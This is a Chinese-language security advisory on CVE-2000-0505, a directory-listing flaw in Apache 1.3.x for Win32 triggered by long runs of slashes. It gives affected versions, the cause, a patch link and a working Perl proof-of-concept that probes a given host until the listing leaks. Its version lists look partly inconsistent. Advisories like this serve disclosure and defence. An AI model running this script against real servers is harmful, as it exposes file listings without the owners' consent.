安全研究

安全漏洞
Apache Web Server(Win32)根目录访问漏洞

发布日期:2000-05-31
更新日期:2000-05-31

受影响系统:
Apache Group Apache 1.3.9win32
Apache Group Apache 1.3.6win32
Apache Group Apache 1.3.20win32
Apache Group Apache 1.3.12win32
Apache Group Apache 1.3.11win32
IBM HTTP Server 1.3.6.2 win32
IBM HTTP Server 1.3.3 win32
不受影响系统:
Apache Group Apache 1.3.13win32
IBM HTTP Server 1.3.6.2 unix
描述:
BUGTRAQ  ID: 1284
CVE(CAN) ID: CVE-2000-0505

Apache是一款广泛使用的开放源代码WEB服务程序。

Apache Web Server 1.3.x(Win32)对于请求路径的处理上存在漏洞,远程攻击者可能利用此漏洞获取目录列表信息。

如果启用了config的话,Apache Web Server 1.3.x(Win32)允许攻击者获得目录的目录列表。攻击者可以在服务器的HTTP请求后附加一些“/”字符(例如http://www.host.com///////////////////////////////////////////////////////... )。在Apache调用stat()检查是否存在index.html时,如果路径过长的话Windows就会返回错误。Apache错误的将其处理为不存在该文件。根据DocumentRoot路径长度的不同,攻击可能需要不同数量的“/”字符。

<*来源:H D Moore (hdm@metasploit.com
        Marek Roy (marek_roy@hotmail.com
        Marc Slemko (marcs@znep.com
  
  链接:http://www.apacheweek.com/features/security-v1.3.6
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl

use LWP::Simple;
use strict;

my $host = shift() || die "usage:  $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $i;

$odata = get("http://$host/");
if ($odata eq "")
{
    die "no response from server:  $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}

建议:
厂商补丁:

Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.apache.org/websrc/cvsweb.cgi/apache-1.3/src/os/win32/util_win32.c.diff?r1=1.33&r2=1.34

浏览次数:6096
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障